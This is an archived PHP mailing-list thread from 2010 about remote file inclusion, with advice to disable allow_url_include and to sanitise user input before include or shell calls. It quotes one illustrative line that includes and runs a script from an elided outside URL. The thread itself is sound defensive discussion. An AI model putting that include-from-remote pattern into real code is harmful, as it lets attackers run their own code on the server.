Security Issue
in [General]
|
Prev: DOMDocument::loadXML() failed when parsing comments inside a script tag
Next: combo box validation
From: "David Stoltz" on 8 Jun 2010 14:55 allow_url_include is (or should be) disabled by default. http://us2.php.net/manual/en/filesystem.configuration.php#ini.allow-url- include I can't think of one good reason to ever enable this, it would be a security issue no matter how you slice it... -----Original Message----- From: Igor Escobar [mailto:titiolinkin(a)gmail.com] Sent: Tuesday, June 08, 2010 10:11 AM To: richgray(a)gmail.com Cc: <php-general(a)lists.php.net> Subject: Re: [PHP] Security Issue Hey Richard, I'll find more about this parameter allow_url_include, thank you! Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 5:26 PM, richard gray <rich(a)richgray.com> wrote: > On 07/06/2010 20:00, Igor Escobar wrote: > >> PHP Injection is the technical name given to a security hole in PHP >> applications. When this gap there is a hacker can do with an external code >> that is interpreted as an inner code as if the code included was more a >> part >> of the script. >> >> // my code... >> // my code... >> include ('http://..../externalhackscript.txt'); >> //my code... >> //my code.. >> > can you not switch off remote file includes in php.ini? > This will stop include/require from a remote host.. > i.e. /allow_url_include = Off in php.ini > > HTH > Rich > / >
From: Michael Shadle on 8 Jun 2010 15:01 Yes and scrubbing the input to ensure the field used for this URL rejects certain characters or does sanity checking on it would also be another suggestion. Turning this off would fix remote include requests. But still need to check for people requesting local files. Should never take user input and put it directly into include or shell execs or anything. On Jun 8, 2010, at 11:55 AM, "David Stoltz" <Dstoltz(a)SHH.ORG> wrote: > allow_url_include is (or should be) disabled by default. > > http://us2.php.net/manual/en/filesystem.configuration.php#ini.allow-url- > include > > I can't think of one good reason to ever enable this, it would be a > security issue no matter how you slice it... > > -----Original Message----- > From: Igor Escobar [mailto:titiolinkin(a)gmail.com] > Sent: Tuesday, June 08, 2010 10:11 AM > To: richgray(a)gmail.com > Cc: <php-general(a)lists.php.net> > Subject: Re: [PHP] Security Issue > > Hey Richard, > > I'll find more about this parameter allow_url_include, thank you! > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar (twitter) > > > > > > On Mon, Jun 7, 2010 at 5:26 PM, richard gray <rich(a)richgray.com> > wrote: > >> On 07/06/2010 20:00, Igor Escobar wrote: >> >>> PHP Injection is the technical name given to a security hole in PHP >>> applications. When this gap there is a hacker can do with an >>> external > code >>> that is interpreted as an inner code as if the code included was >>> more > a >>> part >>> of the script. >>> >>> // my code... >>> // my code... >>> include ('http://..../externalhackscript.txt'); >>> //my code... >>> //my code.. >>> >> can you not switch off remote file includes in php.ini? >> This will stop include/require from a remote host.. >> i.e. /allow_url_include = Off in php.ini >> >> HTH >> Rich >> / >> > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php >
First
|
Prev
|
Pages: 1 2 3 4 5 6 Prev: DOMDocument::loadXML() failed when parsing comments inside a script tag Next: combo box validation |